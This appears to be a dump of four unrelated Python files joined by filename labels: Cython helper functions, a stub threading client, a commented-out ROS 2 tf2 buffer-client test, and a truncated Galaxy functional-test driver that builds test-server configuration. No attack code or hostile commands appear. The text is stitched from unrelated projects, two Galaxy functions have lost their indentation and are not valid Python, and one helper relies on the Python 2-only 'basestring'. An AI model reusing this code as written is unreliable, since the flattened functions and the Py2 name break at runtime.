            pass
    stream = io.open(source_filename, mode=mode,
                     encoding=encoding, errors=error_handling)
    skip_bom(stream)
    return stream
def open_source_from_loader(loader,
                            source_filename,
                            encoding=None, error_handling=None,
                            require_normalised_newlines=True):
    """Open a source file stored inside a zip archive via its PEP 302
    loader, wrapping the raw bytes in a decoding text stream."""
    nrmpath = os.path.normpath(source_filename)
    # Strip '<archive>/' to get the member name inside the archive.
    arcname = nrmpath[len(loader.archive)+1:]
    data = loader.get_data(arcname)
    return io.TextIOWrapper(io.BytesIO(data),
                            encoding=encoding,
                            errors=error_handling)
def str_to_number(value):
    """Convert an integer literal string (already validated by the parser)
    to an int.

    Supports hex (0x), Py3 octal (0o), binary (0b), legacy Py2 octal
    (leading 0) and plain decimal.
    """
    if len(value) >= 2 and value[0] == '0':
        marker = value[1]
        if marker in 'xX':
            # hex notation ('0x1AF')
            return int(value[2:], 16)
        if marker in 'oO':
            # Py3 octal notation ('0o136')
            return int(value[2:], 8)
        if marker in 'bB':
            # Py3 binary notation ('0b101')
            return int(value[2:], 2)
        # Py2 octal notation ('0136')
        return int(value, 8)
    return int(value, 0)
def long_literal(value):
    """True when *value* (an int or a numeric literal string) does not fit
    a signed 32-bit C int and therefore needs a 'long' literal.

    NOTE(review): ``basestring`` is Py2-only; on Python 3 this raises
    NameError -- confirm supported interpreters before changing.
    """
    if isinstance(value, basestring):
        value = str_to_number(value)
    return not -2**31 <= value < 2**31
@cached_function
def get_cython_cache_dir():
    """get the cython cache dir

    Priority:

    1. CYTHON_CACHE_DIR
    2. (OS X): ~/Library/Caches/Cython
       (posix not OS X): XDG_CACHE_HOME/cython if XDG_CACHE_HOME defined
    3. ~/.cython
    """
    if 'CYTHON_CACHE_DIR' in os.environ:
        return os.environ['CYTHON_CACHE_DIR']

    parent = None
    if os.name == 'posix':
        if sys.platform == 'darwin':
            parent = os.path.expanduser('~/Library/Caches')
        else:
            # this could fallback on ~/.cache
            parent = os.environ.get('XDG_CACHE_HOME')

    # Only use the platform cache root if it actually exists.
    if parent and os.path.isdir(parent):
        return os.path.join(parent, 'cython')

    # last fallback: ~/.cython
    return os.path.expanduser(os.path.join('~', '.cython'))
@contextmanager
def captured_fd(stream=2, encoding=None):
    """Capture OS-level writes to file descriptor *stream* (default stderr).

    Yields a zero-argument callable returning everything written so far
    (bytes, or str if *encoding* is given).  The fd is rerouted through a
    pipe drained by a daemon thread and restored on exit.
    """
    pipe_in = t = None
    orig_stream = os.dup(stream)  # keep copy of original stream
    try:
        pipe_in, pipe_out = os.pipe()
        os.dup2(pipe_out, stream)  # replace stream by copy of pipe
        try:
            os.close(pipe_out)  # close original pipe-out stream
            data = []

            def copy():
                # Drain the pipe until the writer side closes, then close
                # our read end so nothing leaks.
                try:
                    while True:
                        d = os.read(pipe_in, 1000)
                        if d:
                            data.append(d)
                        else:
                            break
                finally:
                    os.close(pipe_in)

            def get_output():
                output = b''.join(data)
                if encoding:
                    output = output.decode(encoding)
                return output

            from threading import Thread
            t = Thread(target=copy)
            t.daemon = True  # just in case
            t.start()
            yield get_output
        finally:
            os.dup2(orig_stream, stream)  # restore original stream
            if t is not None:
                # Wait for the drainer to see EOF so data[] is complete.
                t.join()
    finally:
        os.close(orig_stream)
def print_bytes(s, end=b'\n', file=sys.stdout, flush=True):
    """Write raw bytes *s* (plus *end*) to *file*'s binary layer.

    Uses file.buffer on Py3 text streams; falls back to the stream itself
    (Py2 / binary streams).
    """
    file.flush()
    out = getattr(file, 'buffer', file)  # Py3 text streams expose .buffer
    out.write(s)
    if end:
        out.write(end)
    if flush:
        out.flush()
class LazyStr:
    """String-like proxy that defers computing its value.

    The callback is invoked afresh on every str()/repr()/concatenation,
    so the result always reflects current state.
    """
    def __init__(self, callback):
        self.callback = callback
    def __str__(self):
        return self.callback()
    def __repr__(self):
        return self.callback()
    def __add__(self, right):
        return self.callback() + right
    def __radd__(self, left):
        return left + self.callback()
|
client.py | import threading
#ofc we need a separate class for client, but that's just a skeleton for now
def startClient():
    """Placeholder client body; the real networking class is still TODO."""
    message = "started"
    print(message)
def startClicked():
    """UI hook: run startClient() on a background thread so the caller
    never blocks."""
    worker = threading.Thread(target=startClient)
    worker.start()
def main():
    """Entry point: launch the client in a background thread.

    Fix: the original called ``start()``, which is not defined anywhere in
    this module (guaranteed NameError); ``startClicked()`` is the launcher
    this skeleton actually defines.
    """
    startClicked()
if __name__ == "__main__":
    # Script entry point for the client skeleton.
    main()
|
test_buffer_client.py | # TODO (ahcorde): Fix test in CI
# # Copyright 2019 Open Source Robotics Foundation, Inc.
# # All rights reserved.
# #
# # Redistribution and use in source and binary forms, with or without
# # modification, are permitted provided that the following conditions
# # are met:
# #
# # * Redistributions of source code must retain the above copyright
# # notice, this list of conditions and the following disclaimer.
# # * Redistributions in binary form must reproduce the above
# # copyright notice, this list of conditions and the following
# # disclaimer in the documentation and/or other materials provided
# # with the distribution.
# # * Neither the name of the Willow Garage nor the names of its
# # contributors may be used to endorse or promote products derived
# # from this software without specific prior written permission.
# #
# # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# # POSSIBILITY OF SUCH DAMAGE.
#
# import time
# import unittest
# import rclpy
# import threading
#
# from tf2_ros.buffer_client import BufferClient
# from geometry_msgs.msg import TransformStamped
# from tf2_msgs.action import LookupTransform
# from tf2_py import BufferCore, TransformException, TimeoutException, \
# LookupException, InvalidArgumentException, ExtrapolationException, ConnectivityException
# from rclpy.executors import SingleThreadedExecutor
# from tf2_msgs.msg import TF2Error
#
#
# def build_transform(target_frame, source_frame, stamp):
# transform = TransformStamped()
# transform.header.frame_id = target_frame
# transform.header.stamp = stamp
# transform.child_frame_id = source_frame
#
# transform.transform.translation.x = 42.0
# transform.transform.translation.y = -3.14
# transform.transform.translation.z = 0.0
# transform.transform.rotation.w = 1.0
# transform.transform.rotation.x = 0.0
# transform.transform.rotation.y = 0.0
# transform.transform.rotation.z = 0.0
#
# return transform
#
#
# class MockActionServer():
# def __init__(self, node, buffer_core):
# self.goal_srv = node.create_service(
# LookupTransform.Impl.SendGoalService, '/lookup_transform/_action/send_goal',
# self.goal_callback)
# self.cancel_srv = node.create_service(
# LookupTransform.Impl.CancelGoalService, '/lookup_transform/_action/cancel_goal',
# self.cancel_callback)
# self.result_srv = node.create_service(
# LookupTransform.Impl.GetResultService, '/lookup_transform/_action/get_result',
# self.result_callback)
# self.feedback_pub = node.create_publisher(
# LookupTransform.Impl.FeedbackMessage, '/lookup_transform/_action/feedback', 1)
# self.node = node
# self.buffer_core = buffer_core
# self.result_buffer = {}
#
# def goal_callback(self, request, response):
# response.accepted = True
# bytes_goal_id = bytes(request.goal_id.uuid)
# try:
# if not request.goal.advanced:
# transform = self.buffer_core.lookup_transform_core(target_frame=request.goal.target_frame,
# source_frame=request.goal.source_frame,
# time=request.goal.source_time)
# self.result_buffer[bytes_goal_id] = (
# transform, TF2Error.NO_ERROR, '')
# else:
# transform = self.buffer_core.lookup_transform_full_core(
# target_frame=request.goal.target_frame,
# source_frame=request.goal.source_frame,
# source_time=request.goal.source_time,
# target_time=request.goal.target_time,
# fixed_frame=request.goal.fixed_frame
# )
# self.result_buffer[bytes_goal_id] = (
# transform, TF2Error.NO_ERROR, ''
# )
# except TimeoutException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.TIMEOUT_ERROR, e)
# except LookupException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.LOOKUP_ERROR, e)
# except InvalidArgumentException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.INVALID_ARGUMENT_ERROR, e)
# except ExtrapolationException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.EXTRAPOLATION_ERROR, e)
# except ConnectivityException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.CONNECTIVITY_ERROR, e)
# except TransformException as e:
# self.result_buffer[bytes_goal_id] = (
# TransformStamped(), TF2Error.TRANSFORM_ERROR, e)
#
# return response
#
# def cancel_callback(self, request, response):
# response.goals_canceling.append(request.goal_info)
# return response
#
# def result_callback(self, request, response):
# bytes_goal_id = bytes(request.goal_id.uuid)
# response.result.transform = self.result_buffer[bytes_goal_id][0]
# response.result.error = TF2Error(
# error=self.result_buffer[bytes_goal_id][1],
# error_string=str(self.result_buffer[bytes_goal_id][2]))
# return response
#
# def publish_feedback(self, goal_id):
# feedback_message = LookupTransform.Impl.FeedbackMessage()
# feedback_message.goal_id = goal_id
# self.feedback_pub.publish(feedback_message)
#
#
# class TestBufferClient(unittest.TestCase):
# @classmethod
# def setUpClass(cls):
# cls.context = rclpy.context.Context()
# rclpy.init(context=cls.context)
# cls.executor = SingleThreadedExecutor(context=cls.context)
# cls.node = rclpy.create_node('TestBufferClient', context=cls.context)
# cls.executor.add_node(cls.node)
#
# buffer_core = BufferCore()
# transform = build_transform('foo', 'bar', rclpy.time.Time().to_msg())
# buffer_core.set_transform(transform, 'unittest')
#
# cls.mock_action_server = MockActionServer(cls.node, buffer_core)
#
# @classmethod
# def tearDownClass(cls):
# cls.node.destroy_node()
# rclpy.shutdown(context=cls.context)
#
# def setUp(self):
# self.spinning = threading.Event()
# self.spin_thread = threading.Thread(target=self.spin)
# self.spin_thread.start()
# return
#
# def tearDown(self):
# self.spinning.set()
# self.spin_thread.join()
# return
#
# def feedback_callback(self, feedback):
# self.feedback = feedback
#
# def spin(self):
# try:
# while self.context.ok() and not self.spinning.is_set():
# self.executor.spin_once(timeout_sec=0.05)
# finally:
# return
#
# def timed_spin(self, duration):
# start_time = time.time()
# while (time.time() - start_time) < duration:
# rclpy.spin_once(self.node, executor=self.executor, timeout_sec=0.1)
#
# def execute_goal_callback(self, goal_handle):
# print('execute_goal_callback')
# goal_handle.set_succeeded()
# return LookupTransform.Result()
#
# def test_lookup_transform_true(self):
# buffer_client = BufferClient(
# self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
#
# result = buffer_client.lookup_transform(
# 'foo', 'bar', rclpy.time.Time(), rclpy.duration.Duration(seconds=5.0))
#
# self.assertEqual(build_transform(
# 'foo', 'bar', rclpy.time.Time().to_msg()), result)
#
# def test_lookup_transform_fail(self):
# buffer_client = BufferClient(
# self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
#
# with self.assertRaises(LookupException) as ex:
# result = buffer_client.lookup_transform(
# 'bar', 'baz', rclpy.time.Time(), rclpy.duration.Duration(seconds=5.0))
#
# self.assertEqual(LookupException, type(ex.exception))
#
# if __name__ == '__main__':
# unittest.main()
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import logging
import os
import random
import re
import shutil
import signal
import string
import subprocess
import sys
import tempfile
import threading
import time
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from six.moves import (
http_client,
shlex_quote
)
from six.moves.urllib.parse import urlparse
from sqlalchemy_utils import (
create_database,
database_exists,
)
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import GalaxyInteractorApi, verify_tool
from galaxy.util import asbool, download_to_file, galaxy_directory
from galaxy.util.properties import load_app_properties
from galaxy.web import buildapp
from galaxy_test.base.api_util import get_master_api_key, get_user_api_key
from galaxy_test.base.env import (
DEFAULT_WEB_HOST,
target_url_parts,
)
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
# Paths and defaults shared by all functional-test drivers.
galaxy_root = galaxy_directory()
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
# Comma-separated list: local dir first, remote test-data repo as fallback.
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
    os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
REALTIME_PROXY_TEMPLATE = string.Template(r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
# if interactive tool path, jump to interactive tool, else skip to
# endendend (default uwsgi params).
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
""")
DEFAULT_LOCALES = "en"

log = logging.getLogger("test_driver")

# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
    """Ensure TOOL_SHED_TEST_TMP_DIR points at a real directory; return it.

    Temporary directories for the hgweb.config file, the database, new
    repositories, etc. are created inside this directory.  Since the tool
    shed browses repository contents via HTTP, the full path to the
    temporary directory where the repositories are located cannot contain
    invalid URL characters.
    """
    tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR')
    if tmp_dir is None:
        tmp_dir = os.path.realpath(tempfile.mkdtemp())
    os.environ['TOOL_SHED_TEST_TMP_DIR'] = tmp_dir
    return tmp_dir
def get_galaxy_test_tmp_dir():
    """Create test directory for use by Galaxy server being setup for testing."""
    configured = os.environ.get('GALAXY_TEST_TMP_DIR')
    return tempfile.mkdtemp() if configured is None else configured
def configure_environment():
    """Hack up environment for test cases."""
    defaults = {}
    if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
        defaults['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
    # Used by get_filename in tool shed's twilltestcase.
    if 'TOOL_SHED_TEST_FILE_DIR' not in os.environ:
        defaults['TOOL_SHED_TEST_FILE_DIR'] = TOOL_SHED_TEST_DATA
    os.environ.update(defaults)
    # Marker so test code can detect that this setup already ran.
    os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
    """Build a logger for test driver script."""
    # Simply returns the module-level "test_driver" logger defined above.
    return log
def ensure_test_file_dir_set():
    """Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.

    Return first directory for backward compat.
    """
    # May be a comma-separated list of directories; export it back so
    # subprocesses see the same value.
    file_dirs = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
    os.environ['GALAXY_TEST_FILE_DIR'] = file_dirs
    return file_dirs.split(",", 1)[0]
def setup_galaxy_config(
    tmpdir,
    use_test_file_dir=False,
    default_install_db_merged=True,
    default_tool_data_table_config_path=None,
    default_shed_tool_data_table_config=None,
    default_job_config_file=None,
    enable_tool_shed_check=False,
    default_tool_conf=None,
    shed_tool_conf=None,
    datatypes_conf=None,
    update_integrated_tool_panel=False,
    prefer_template_database=False,
    log_format=None,
    conda_auto_init=False,
    conda_auto_install=False,
    use_shared_connection_for_amqp=False,
):
    """Setup environment and build config for test Galaxy instance.

    Creates scratch directories under ``tmpdir`` and returns a dict of Galaxy
    configuration options suitable for launching an embedded or uwsgi test
    server. Several options can be overridden via GALAXY_TEST_* environment
    variables (job config, tool path/conf, conda settings).

    NOTE(review): the ``log_format`` parameter is currently unused in this
    function body — confirm whether callers rely on it elsewhere.
    """
    # For certain docker operations this needs to be evaluated out - e.g. for cwltool.
    tmpdir = os.path.realpath(tmpdir)
    if not os.path.exists(tmpdir):
        os.makedirs(tmpdir)
    template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
    new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
    job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
    if use_test_file_dir:
        first_test_file_dir = ensure_test_file_dir_set()
        if not os.path.isabs(first_test_file_dir):
            first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
        library_import_dir = first_test_file_dir
        import_dir = os.path.join(first_test_file_dir, 'users')
        if os.path.exists(import_dir):
            user_library_import_dir = import_dir
        else:
            user_library_import_dir = None
    else:
        user_library_import_dir = None
        library_import_dir = None
    job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
    tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
    tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
    default_data_manager_config = None
    # Prefer a real data manager config from the working directory if present.
    for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
        if os.path.exists(data_manager_config):
            default_data_manager_config = data_manager_config
    data_manager_config_file = 'test/functional/tools/sample_data_manager_conf.xml'
    if default_data_manager_config is not None:
        data_manager_config_file = "{},{}".format(default_data_manager_config, data_manager_config_file)
    master_api_key = get_master_api_key()
    cleanup_job = 'never' if ("GALAXY_TEST_NO_CLEANUP" in os.environ or
                              "TOOL_SHED_TEST_NO_CLEANUP" in os.environ) else 'onsuccess'
    # Data Manager testing temp path
    # For storing Data Manager outputs and .loc files so that real ones don't get clobbered
    galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
    tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
    conda_auto_install = os.environ.get('GALAXY_TEST_CONDA_AUTO_INSTALL', conda_auto_install)
    conda_auto_init = os.environ.get('GALAXY_TEST_CONDA_AUTO_INIT', conda_auto_init)
    conda_prefix = os.environ.get('GALAXY_TEST_CONDA_PREFIX')
    if tool_conf is None:
        # As a fallback always at least allow upload.
        tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
    if shed_tool_conf is not None:
        tool_conf = "{},{}".format(tool_conf, shed_tool_conf)
    # Resolve these paths w.r.t. galaxy root; otherwise galaxy's config system will resolve them w.r.t.
    # their parent directories, as per schema.
    data_manager_config_file = _resolve_relative_config_paths(data_manager_config_file)
    tool_config_file = _resolve_relative_config_paths(tool_conf)
    tool_data_table_config_path = _resolve_relative_config_paths(tool_data_table_config_path)
    config = dict(
        admin_users='test@bx.psu.edu',
        allow_library_path_paste=True,
        allow_user_creation=True,
        allow_user_deletion=True,
        api_allow_run_as='test@bx.psu.edu',
        auto_configure_logging=logging_config_file is None,
        check_migrate_tools=False,
        chunk_upload_size=100,
        conda_prefix=conda_prefix,
        conda_auto_init=conda_auto_init,
        conda_auto_install=conda_auto_install,
        cleanup_job=cleanup_job,
        retry_metadata_internally=False,
        data_dir=tmpdir,
        data_manager_config_file=data_manager_config_file,
        enable_beta_tool_formats=True,
        expose_dataset_path=True,
        ftp_upload_purge=False,
        galaxy_data_manager_data_path=galaxy_data_manager_data_path,
        id_secret='changethisinproductiontoo',
        job_config_file=job_config_file,
        job_working_directory=job_working_directory,
        library_import_dir=library_import_dir,
        log_destination="stdout",
        new_file_path=new_file_path,
        override_tempdir=False,
        master_api_key=master_api_key,
        running_functional_tests=True,
        template_cache_path=template_cache_path,
        template_path='templates',
        tool_config_file=tool_config_file,
        tool_data_table_config_path=tool_data_table_config_path,
        tool_parse_help=False,
        tool_path=tool_path,
        update_integrated_tool_panel=update_integrated_tool_panel,
        use_tasked_jobs=True,
        use_heartbeat=False,
        user_library_import_dir=user_library_import_dir,
        webhooks_dir=TEST_WEBHOOKS_DIR,
        logging=LOGGING_CONFIG_DEFAULT,
        monitor_thread_join_timeout=5,
        object_store_store_by="uuid",
        simplified_workflow_run_ui="off",
    )
    if default_shed_tool_data_table_config:
        config["shed_tool_data_table_config"] = default_shed_tool_data_table_config
    if not use_shared_connection_for_amqp:
        config["amqp_internal_connection"] = "sqlalchemy+sqlite:///%s?isolation_level=IMMEDIATE" % os.path.join(tmpdir, "control.sqlite")
    config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
    config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
    if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
        # Write a two-backend hierarchical object store config under tmpdir.
        object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
        with open(object_store_config, "w") as f:
            contents = """
type: hierarchical
backends:
  - id: files1
    type: disk
    weight: 1
    files_dir: "${temp_directory}/files1"
    extra_dirs:
      - type: temp
        path: "${temp_directory}/tmp1"
      - type: job_work
        path: "${temp_directory}/job_working_directory1"
  - id: files2
    type: disk
    weight: 1
    files_dir: "${temp_directory}/files2"
    extra_dirs:
      - type: temp
        path: "${temp_directory}/tmp2"
      - type: job_work
        path: "${temp_directory}/job_working_directory2"
"""
            contents_template = string.Template(contents)
            expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
            f.write(expanded_contents)
        config["object_store_config_file"] = object_store_config
    if datatypes_conf is not None:
        config['datatypes_config_file'] = datatypes_conf
    if enable_tool_shed_check:
        config["enable_tool_shed_check"] = enable_tool_shed_check
        config["hours_between_check"] = 0.001
    tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR')
    if tool_dependency_dir:
        config["tool_dependency_dir"] = tool_dependency_dir
    # Used by shed's twill dependency stuff
    # TODO: read from Galaxy's config API.
    os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, 'dependencies')
    return config
def _resolve_relative_config_paths(config_option):
# If option is not None, split into paths, resolve each w.r.t. root, then rebuild as csv string.
if config_option is not None:
resolved = []
for path in config_option.split(','):
resolved.append(os.path.join(galaxy_root, path.strip()))
return ','.join(resolved)
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherwise find whatever Galaxy would use as the default and
# the sample data for functional tests to that.
default_tool_data_config = 'lib/galaxy/config/sample/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
test_tool_data_config = 'test/functional/tool-data/sample_tool_data_tables.xml'
tool_data_table_config_path = '%s,%s' % (default_tool_data_config, test_tool_data_config)
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
    """Setup a nose context and run tests.

    Tests are specified by argv (defaulting to sys.argv).

    :param argv: nose command line, defaults to ``sys.argv``.
    :param env: environment mapping handed to nose, defaults to ``os.environ``.
    :param ignore_files: file patterns nose should skip.
    :param plugins: nose plugin manager, defaults to nose's default set.
    :returns: True if the whole run succeeded.
    """
    if env is None:
        env = os.environ
    if ignore_files is None:
        ignore_files = []
    if plugins is None:
        plugins = nose.plugins.manager.DefaultPluginManager()
    if argv is None:
        argv = sys.argv
    test_config = nose.config.Config(
        # Fixed: previously hardcoded os.environ here, silently ignoring the
        # ``env`` parameter accepted above.
        env=env,
        ignoreFiles=ignore_files,
        plugins=plugins,
    )
    # Add custom plugin to produce JSON data used by planemo.
    test_config.plugins.addPlugin(StructuredTestDataPlugin())
    test_config.configure(argv)
    result = run(test_config)
    success = result.wasSuccessful()
    return success
def copy_database_template(source, db_path):
    """Copy a 'clean' sqlite template database.

    From file or URL to specified path for sqlite database.
    """
    parent_dir = os.path.dirname(db_path)
    if not os.path.exists(parent_dir):
        os.makedirs(parent_dir)
    if os.path.exists(source):
        shutil.copy(source, db_path)
        assert os.path.exists(db_path)
        return
    if source.lower().startswith(("http://", "https://", "ftp://")):
        try:
            download_to_file(source, db_path)
        except Exception as e:
            # We log the exception but don't fail startup, since we can
            # do all migration steps instead of downloading a template.
            log.exception(e)
        return
    raise Exception("Failed to copy database template from source %s" % source)
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
    """Find (and populate if needed) Galaxy database connection.

    If <PREFIX>_TEST_DBURI is set, use it (optionally cloning a postgres
    template database with a random name); otherwise fall back to a sqlite
    file under ``db_path``, optionally seeded from <PREFIX>_TEST_DB_TEMPLATE.
    Returns a dict of database_* config options.
    """
    database_auto_migrate = False
    check_migrate_databases = True
    dburi_var = "%s_TEST_DBURI" % prefix
    template_name = None
    if dburi_var in os.environ:
        database_connection = os.environ[dburi_var]
        # only template if postgres - not mysql or sqlite
        do_template = prefer_template_database and database_connection.startswith("p")
        if do_template:
            database_template_parsed = urlparse(database_connection)
            template_name = database_template_parsed.path[1:]  # drop / from /galaxy
            # Random suffix so parallel runs get distinct databases.
            actual_db = "gxtest" + ''.join(random.choice(string.ascii_uppercase) for _ in range(10))
            actual_database_parsed = database_template_parsed._replace(path="/%s" % actual_db)
            database_connection = actual_database_parsed.geturl()
            if not database_exists(database_connection):
                # We pass by migrations and instantiate the current table
                create_database(database_connection)
                mapping.init('/tmp', database_connection, create_tables=True, map_install_models=True)
                toolshed_mapping.init(database_connection, create_tables=True)
                check_migrate_databases = False
    else:
        default_db_filename = "%s.sqlite" % prefix.lower()
        template_var = "%s_TEST_DB_TEMPLATE" % prefix
        db_path = os.path.join(db_path, default_db_filename)
        if template_var in os.environ:
            # Middle ground between recreating a completely new
            # database and pointing at existing database with
            # GALAXY_TEST_DBURI. The former requires a lot of setup
            # time, the latter results in test failures in certain
            # cases (namely tool shed tests expecting clean database).
            copy_database_template(os.environ[template_var], db_path)
            database_auto_migrate = True
        database_connection = 'sqlite:///%s' % db_path
    config = {
        "check_migrate_databases": check_migrate_databases,
        "database_connection": database_connection,
        "database_auto_migrate": database_auto_migrate
    }
    if not database_connection.startswith("sqlite://"):
        # Larger pool for real database servers shared by test threads.
        config["database_engine_option_max_overflow"] = "20"
        config["database_engine_option_pool_size"] = "10"
    if template_name:
        config["database_template"] = template_name
    return config
def install_database_conf(db_path, default_merged=False):
    """Return config options for the tool-install database connection.

    Resolution order: GALAXY_TEST_INSTALL_DBURI env var; then "merged" mode
    (share the main Galaxy database - no separate connection emitted); then
    a fresh sqlite file under ``db_path``.
    """
    if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
        install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
    elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
        install_galaxy_database_connection = None
    else:
        install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
        install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
    conf = {}
    if install_galaxy_database_connection is not None:
        conf["install_database_connection"] = install_galaxy_database_connection
    return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
    """Create a mock database/ directory like in GALAXY_ROOT.

    Use prefix to default this if TOOL_SHED_TEST_DBPATH or
    GALAXY_TEST_DBPATH is set in the environment.
    """
    override = os.environ.get("%s_TEST_DBPATH" % prefix)
    if override is not None:
        return override
    return os.path.join(tempfile.mkdtemp(dir=test_tmpdir), 'database')
def _get_static_settings():
    """Configuration required for Galaxy static middleware.

    Returns dictionary of the settings necessary for a galaxy App
    to be wrapped in the static middleware.

    This mainly consists of the filesystem locations of url-mapped
    static resources.
    """
    static_dir = os.path.join(galaxy_root, "static")

    def _static(*parts):
        return os.path.join(static_dir, *parts)

    # TODO: these should be copied from config/galaxy.ini
    return {
        'static_enabled': True,
        'static_cache_time': 360,
        'static_dir': static_dir,
        'static_images_dir': _static('images', ''),
        'static_favicon_dir': _static('favicon.ico'),
        'static_scripts_dir': _static('scripts', ''),
        'static_style_dir': _static('style'),
        'static_robots_txt': _static('robots.txt'),
